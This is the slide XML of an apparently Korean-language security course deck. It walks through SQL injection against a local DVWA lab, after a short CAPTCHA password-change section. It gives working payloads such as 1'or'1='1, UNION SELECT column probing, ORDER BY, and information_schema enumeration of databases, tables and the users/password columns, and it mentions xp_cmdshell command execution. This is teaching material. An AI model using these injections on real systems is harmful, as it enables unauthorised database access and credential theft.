            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600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의 정보를 비교한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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96362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5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Security Level : Impossible</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="25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730925"/>
            <a:ext cx="5913238" cy="2501975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CAPTCHA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TRUE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경우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변경 전 비밀번호와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저장된 비밀번호의 값을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대조하여 일치하면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새로운 비밀번호로 변경할 수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있게 구성된 소스 코드이다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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{870402C2-6F63-46B2-B3C9-93B803A2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0" y="1879600"/>
            <a:ext cx="5901779" cy="467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4763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3-6)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Insecure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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CAPTCHA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5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Security Level : Impossible</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="25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BurpSuite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사용하여 패킷을 열어보면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다음과 같이 전송된다는 것을 알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비밀번호의 값을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대조하여 확인하므로</a:t>
            </a:r>
            <a:b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step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조작하는 것 만으로는 비밀번호를 변경할 수 없다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88C0E64E-59F5-439A-909C-C90D9F9CF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1" y="1755126"/>
            <a:ext cx="5913238" cy="512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31024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9A351A-DCCD-4BAC-94BF-632B61B5151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7D94560D-C34C-4211-8812-E8601EBA9B8D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16541F1C-A245-42F8-8FC8-701268C41998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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE419C1-CCEB-48FC-84BE-079C3DB5FC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2385813" y="3048507"/>
            <a:ext cx="4485405" cy="135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SQL Injection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66579-EDC9-4324-B476-6FF19928A34D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99261" y="3309457"/>
            <a:ext cx="1912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3-7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30202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50" y="771256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SQL Injection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이란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575610-64E5-4AB6-9ABC-1C67EB419E9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392386" y="5059979"/>
            <a:ext cx="6050309" cy="2399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150"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="15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5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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5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인젝션은</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5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 이용자에게 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-55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입력받은</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5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 다양한 조건 혹은 정보를 이용해</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5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 DB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-5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에서 정보를 조회해 이용자의 웹 브라우저에 출력하는 과정에서 발생할 수 있는 소스코드의 취약점을 공격하는 해킹기술이다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="-55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굴림" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a: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굴림" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p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이용자의 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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입력값이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SQL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구문의 일부로 사용될 경우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해커에 의해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조작된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SQL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구문이 데이터베이스에 그대로 전달되어 비정상적인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DB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명령을 실행시키는 공격 기법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F87049-F9E0-4FA1-84C2-88169FCFE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91" y="1480632"/>
            <a:ext cx="5955744" cy="336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81292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SQL Injection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이란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085D85-1CB9-44DF-86B4-0DB1DEED97A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466205" y="1735320"/>
            <a:ext cx="5902671" cy="792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SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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인젝션은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 최소한 다음의 조건을 충족해야 공격이 가능하다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나눔스퀘어_ac Bold" panose="020B0600000101010101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웹 애플리케이션이 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DB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와 연동하고 있다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나눔스퀘어_ac Bold" panose="020B0600000101010101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외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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입력값이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 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DB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쿼리문으로 사용된다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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p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 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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p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공격 기법</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-34290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쿼리 조건 무력화 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(Where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구문 우회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)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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="48260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-Where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구문은 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SQL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에서 조건을 기술하는 구문이다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 Where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조건에 기술된 구문이 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‘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참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’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이 되는 범위만 쿼리 결과로 변환된다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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="48260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해커는 이 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Where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조건이 무조건 참이 되도록 쿼리를 조작하여 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Where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조건을 우회하게 만든다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나눔스퀘어_ac Bold" panose="020B0600000101010101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고의적 에러 유발 후 정보획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="48260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-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기본적으로 웹 애플리케이션은 쿼리 수행 중 오류가 발생하면 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DB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오류를 그대로 브라우저에 출력한다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이 오류 정보를 통해 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DB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의 스키마 정보나 데이터가 유출될 수 있다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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p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   3.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시스템 명령어 실행</a:t>
            </a:r>
          </a:p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      -MS SQL Server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의 경우 시스템 명령을 실행 할 수 있는 확장 프로시저를 제공한다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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Xp_cmdshell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프로시저를 이용한다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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UserID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값에 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;(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콜론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)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으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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XP_cmdshell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실행 구문을 연결하고 이후 구문은 주석처리 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR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되도록하여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 윈도우 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C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드라이버를 탐색하는 명령을 보낸다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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이 계정에 유효한 권한이 주어져 있다면 어떤 시스템 명령도 내릴 수 있게 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="16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나눔스퀘어_ac Bold" panose="020B0600000101010101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9656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SQL Injection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이란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28D95B-BE9B-4E28-97CE-484790154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4" y="1755126"/>
            <a:ext cx="5877949" cy="2898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E79E50-0E4C-4431-87FB-F3BA406BA375}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508564" y="4653563"/>
            <a:ext cx="60046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칼리리눅스에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접속해 웹 브라우저에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localhost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dvwa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login.php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입력하여 DVWA 에 접속합니다.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E6B26E8-DF98-4B3D-88C0-752E2F074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72" y="5576893"/>
            <a:ext cx="6059310" cy="31820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34A607-C231-4BBC-905A-DF43610DD9FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="8694498"/>
            <a:ext cx="61773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DVWA 같은 경우는 난이도가 [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Low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] , [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Medium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] , [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High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] , [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impossible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]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이렇게 4단계가 있습니다. 현재 난이도는 [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Low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] 입니다.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5D396A4-99D6-4868-8AA8-58B999999842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1869637" y="7552000"/>
            <a:ext cx="1715392" cy="283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1D3402D-FB21-48E1-8AAE-B5A0891612FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1802165" y="6067893"/>
            <a:ext cx="1715392" cy="283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993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XAMPP – Manage Servers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524EC73C-EE4F-41BA-BCA6-EF67EB02E90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r="8497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프로그램을 실행하고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Manage Servers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창에 있는 서버들이 빨간 색이라면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Start All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 모두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시작시킨다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모두 초록불이 들어오지 않는다면 터미널창에서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pkill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[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servername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이미 구동되고 있는 서버를 꺼주고 다시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Start All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누른다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36256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SQL Injection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이란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27154B-AF03-4CC8-A02A-2616D46CA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1775146"/>
            <a:ext cx="5959823" cy="3848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D04D30-2146-4A3F-A9C2-F8C462C0A4CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426690" y="5694943"/>
            <a:ext cx="60503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우측에 테스트할 수 있는 공격들의 목록이 보이는데 이 중 우리는 SQL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인젝션을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테스트 하기 위해서 [SQL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Injection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] 을 클릭합니다.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B9645A5-2E32-4665-AB4A-BE0AA44B3DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426690" y="4126629"/>
            <a:ext cx="1300510" cy="1986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281981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SQL Injection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이란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84D86C-4C46-4177-B573-A2E0A3952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1" y="1775147"/>
            <a:ext cx="5970709" cy="41701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D6E4AD-7B96-4FFE-AF3C-7F0BFBDDD9BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471488" y="6130155"/>
            <a:ext cx="6004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다음과 같이 SQL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인젝션을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테스트할 수 있는 창이 뜹니다.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53EC02-3368-4B44-84C5-F6E2EC8113A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254003" y="3338701"/>
            <a:ext cx="1715392" cy="283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8D1A2A-6055-4144-8476-2BFD797C07D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1969395" y="2185712"/>
            <a:ext cx="2254262" cy="28357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81286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실습환경에는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1~5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까지의 사용자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입력값을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검증하지 않는다는 가정하에 해당 사용자의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입력하는 폼에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“’”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작은 따옴표를 입력해서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MySQL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에러를 일으켜보겠다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29BF398-27FF-41F4-A6BB-AA17602183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2386" y="1665351"/>
            <a:ext cx="6050310" cy="2762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0871258-40C4-4070-B386-950D68E2AC2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6050" y="4428214"/>
            <a:ext cx="6045259" cy="25338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3CAB35E-F112-4B4C-9C6F-F08A8C889B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829720" y="2738403"/>
            <a:ext cx="2161707" cy="4044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17820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691" y="4028987"/>
            <a:ext cx="5913238" cy="2270834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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>에러가 뜬 것을 볼 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>해당 구문이 나올 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>에 취약하다는 것을 의미하며 추가적인 공격이 가능하다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="나눔스퀘어_ac Bold" panose="020B0600000101010101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F74F6414-A5DF-41A0-A750-4780CCF038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6691" y="1911843"/>
            <a:ext cx="6076769" cy="1775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354540" y="3181657"/>
            <a:ext cx="6148920" cy="5054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C9961-1E6A-4054-B2E3-E1F16CF3FDAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="7285703"/>
            <a:ext cx="6031079" cy="1676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User_id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=’$id’;”;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라고 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR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적혀있다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나눔스퀘어_ac Bold" panose="020B0600000101010101"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="just" defTabSz="4572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$id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라는 변수는 이미 작은따옴표로 둘러 쌓여져 있기 때문에 작은 따옴표 하나만 입력하게 되면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Where </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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user_id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=”’3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개가 되기 때문에 에러가 발생하게 된 것입니다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나눔스퀘어_ac Bold" panose="020B0600000101010101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AB34FB-3EAA-4220-976A-F4F7C9F87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65" y="5650449"/>
            <a:ext cx="6285531" cy="12987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FFA4E86-588C-42E3-8932-5FDFAFE98B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5672380" y="5935852"/>
            <a:ext cx="931616" cy="10641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50790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66D5447A-CDC1-41CA-A635-FE0113DD844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WHERE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 우회 기법인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1’or’1=’1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을 입력해보면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ID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을 포함한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에 있는 모든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ID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값과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name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을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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도출시킵니다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‘1’=’1’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 참값이 되었기에 모든 계정을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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도출시키게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된 것이다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28CF7C31-DA62-465B-AA73-5990E15AB2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379" y="1783047"/>
            <a:ext cx="5913237" cy="51002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4015A6A-8950-4759-B920-884DE05DBB9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="4111595"/>
            <a:ext cx="2552699" cy="450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BC42E08-5B8C-4DD2-88FA-05216B16DC92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="876298" y="4765645"/>
            <a:ext cx="2552699" cy="450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893EE9-FA6B-480E-9B6B-7F2E157F83A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761999" y="5514976"/>
            <a:ext cx="2552699" cy="450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4A82E6-4229-40BA-A973-5EF922CC49AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761998" y="6245871"/>
            <a:ext cx="2552699" cy="4508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29680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77B37A9-1C62-41AD-894E-9E53FA8A3F2F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691" y="4486275"/>
            <a:ext cx="5913238" cy="2270834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Union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구문인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1’union select 1#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을 입력해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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컬럼갯수를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알아내 보도록 하겠다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컬럼개수가 정확히 맞지 않는 이상 구문 에러가 발생한다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6E1AA58-F2EB-474C-858E-DC00F222A7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380" y="1844645"/>
            <a:ext cx="5901779" cy="2476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60E86EF-0F13-4F1C-98C2-0F7468384D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33921" y="5876728"/>
            <a:ext cx="6270074" cy="2795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5BE0B6-2D0D-4E55-8BCE-6C70D8689E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="8672050"/>
            <a:ext cx="392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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>오류발생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BD300A2-FCFB-43F5-A7B0-703BBC75A750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1808480" y="4525108"/>
            <a:ext cx="2001520" cy="2695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872691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6D5832F-0E65-4A9C-BCFE-A6727598C568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072" y="5193397"/>
            <a:ext cx="5913238" cy="2270834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1’union select 1,1#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을 입력해보았다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컬럼수를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올려본 결과 합집합의 의미를 담고 있는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union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구문으로 인해 우리가 따로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select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로 추가했던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First name:1 /Surname:1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도 출력된 것을 볼 수 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143C23E-D814-4F64-936A-F525925CDF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380" y="1839033"/>
            <a:ext cx="5780936" cy="32196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346BDA8-5740-4FFC-A6FD-7E782924C53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2380" y="6548339"/>
            <a:ext cx="5913238" cy="1518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8A8E04-0F5D-4C26-ACAF-CA0E173B446E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472380" y="8377084"/>
            <a:ext cx="5958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컬럼수를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하나 더 높여서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1’ union select 1,1,1#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을 입력해보면 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="18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구문에러가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발생한다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즉 컬럼이 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kumimoji="0" lang="ko-KR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개 사용되고 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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ko-KR" altLang="ko-KR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584D80-C253-4AFD-B8FF-6AB9343C39C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518071" y="7701650"/>
            <a:ext cx="4673053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87A4BC-DFDC-43DF-A5FF-92345A4A926E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="4447786"/>
            <a:ext cx="1847849" cy="4354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27890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64CD43F-5B0E-456E-BC28-74BAA9005E4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8072" y="4520373"/>
            <a:ext cx="5867547" cy="4977588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Union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 말고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order by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구문을 통해서도 컬럼 개수를 알아낼 수 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Order by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구문의 사용 목적은 특정한 컬럼을 기준으로 정렬할 때 사용하는 키워드이다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즉 컬럼의 개수보다 큰 값을 찾아 내게 되면 정렬을 할 수 없기 때문에 에러를 발생시키게 되는 것이다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Order by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를 사용해본 결과 에러가 발생하지 않고 정상적으로 출력되었다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그렇다면 에러가 발생할 때까지 숫자를 증가시켜보자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D607A8A-C29D-4A66-8DFA-D37C0E9B36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379" y="1725583"/>
            <a:ext cx="5901779" cy="26989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3743224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4D452C52-233B-46F5-81B4-462AB28C1B79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921" y="4018040"/>
            <a:ext cx="6016078" cy="5273435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1’order by 3#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에서 에러페이지가 뜨는 것을 확인하였다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이것을 바탕으로 해당 컬럼은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개를 사용한다는 것을 알 수 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union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구문과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order by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구문의 차이점이라면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union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구문의 경우 컬럼의 개수가 정확히 맞을 때까지 하나씩 대입해봐야 하지만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order by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를 사용하면 컬럼의 개수가 입력 값 보다 큰지 안 큰지 유무를 통해 확인 할 수 있기 때문에 금방 발견할 수 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CA0BF695-5B29-4FDA-BF59-C5116CAFB0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380" y="1828798"/>
            <a:ext cx="6004619" cy="2064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74D803F-F5B6-4622-9CFF-A78FA32AFCBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426690" y="3476541"/>
            <a:ext cx="2735609" cy="33629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75131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4B154F-AA77-44E3-BF8E-60A7BA908F1F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1’ union select schema_name,1 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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information_schema.schemata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#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user id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에 입력하니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MySQL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information_schema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라는 데이터베이스에서 정보 등을 관리하고 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Schema_name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구문을 통해 데이터베이스의 이름을 조회해본 결과 모든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DB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이름들이 도출된 것을 확인할 수 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E741B3C-5027-4F2B-81EC-15F895AC45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380" y="1828798"/>
            <a:ext cx="5901779" cy="50545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F88B678-AA3C-4EE9-B011-FEA15D59EA1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="2990851"/>
            <a:ext cx="1571625" cy="20954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4355C3B-4891-4560-B23F-256E2EA58462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743075" y="4140176"/>
            <a:ext cx="1571625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E47ED77-5536-4572-A05E-C4FE7BC5CC5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743075" y="4756121"/>
            <a:ext cx="542925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2639F3-C635-4D30-9D8D-31692AB33F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743074" y="5332737"/>
            <a:ext cx="1674467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8D2BD8D-2E88-41F0-84A5-034586E48159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1743076" y="5937164"/>
            <a:ext cx="933450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0A9FA57-576D-447E-A8AF-065F3171B478}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675433" y="6528387"/>
            <a:ext cx="542925" cy="2857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7162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524EC73C-EE4F-41BA-BCA6-EF67EB02E90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3" t="1220" r="17" b="-1220"/>
          <a:stretch/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Welcome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창에서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 To Application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눌러서 뜨는 브라우저 창에 우측 상단에 있는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phpMyAdmin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클릭하여 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55245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EC09A4-70F3-4F2B-A601-6909A7C54ED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79" y="5655178"/>
            <a:ext cx="6004618" cy="3849249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DB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명을 획득했으니 이제 상위 구문을 통해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Table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명을 획득해보자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위에 보다시피 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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admin,guestbook,users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라는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개의 테이블이 조회되었다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751C818-2654-40B6-8D3E-0967983017B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379" y="1755126"/>
            <a:ext cx="6004620" cy="39000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3461CC0-A1A3-4CF9-B4AA-F380B0B37EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="555625" y="3609975"/>
            <a:ext cx="1000125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0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0DF7A5-759D-4233-A0E0-0140E5BACB3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589251" y="4403976"/>
            <a:ext cx="1116359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59F03CF-DF4F-4E17-9F4E-73D22EE3C0BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584201" y="5206750"/>
            <a:ext cx="1000125" cy="2952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276404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7F2E944C-30FE-4CA8-85D1-172A6A8DD7FA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6911264"/>
            <a:ext cx="5913238" cy="2270834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“users”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라는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Column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정보를 획득하기 위해 상위의 구문을 사용하였습니다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결과적으로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(admin, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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user_id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first_name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, user, password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등의 계정 정보에 대한 컬럼이 확인되었다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union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구문을 통해 계정정보를 획득해보자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0DE2DAAE-A0AE-4895-8706-01BC7026C3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6690" y="1793164"/>
            <a:ext cx="6004619" cy="49320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7DFCF2B-F3EA-4381-9084-62D2DD37AF23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="2773586"/>
            <a:ext cx="1002060" cy="2839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1AAE46A-6D9A-4E14-986B-8C2BF7509FCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
